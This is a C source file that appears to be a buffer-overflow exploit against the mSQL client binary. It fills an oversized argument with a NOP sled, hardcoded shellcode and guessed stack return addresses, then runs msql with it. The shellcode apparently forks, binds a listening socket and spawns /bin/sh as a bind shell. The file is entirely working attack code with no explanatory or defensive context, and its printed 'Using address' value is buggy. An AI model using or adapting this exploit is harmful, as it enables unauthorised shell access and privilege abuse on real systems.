#include <unistd.h> 
#include <stdio.h> 
#include <stdlib.h>
#include <fcntl.h>
   
#define MSQL_PATH "/usr/local/bin/msql"
#define BUFFER_SIZE 999
#define DEFAULT_OFFSET 0

#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] = 
  "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89"
  "\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe"
  "\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66"
  "\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10"
  "\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66"
  "\xb3\x04\xcd\x80\xeb\x04\xeb\x48\xeb\x4e\x31\xc0\x89\x46\x04\x89"
  "\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
  "\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xc7\x06\x2f\x62"
  "\x69\x6e\xc7\x46\x04\x2f\x73\x68\x21\x31\xc0\x88\x46\x07\x89\x76"
  "\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
  "\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5f\xff\xff\xff";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}
   
void main(int argc,char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   int i,off = DEFAULT_OFFSET;


   buff = malloc(2048);
   ptr = buff;
      
   for (i = 0; i <= BUFFER_SIZE ;i+=NOP_SIZE) {
        memcpy (ptr,nop,NOP_SIZE);
        ptr+=NOP_SIZE; 
   }

   for(i=0;i < strlen(shellcode);i++)
      *(ptr++) = shellcode[i];
   
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_sp()+off;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   printf("Using address: 0x%x\n", get_sp);
   execl(MSQL_PATH, "msql",buff, NULL);
}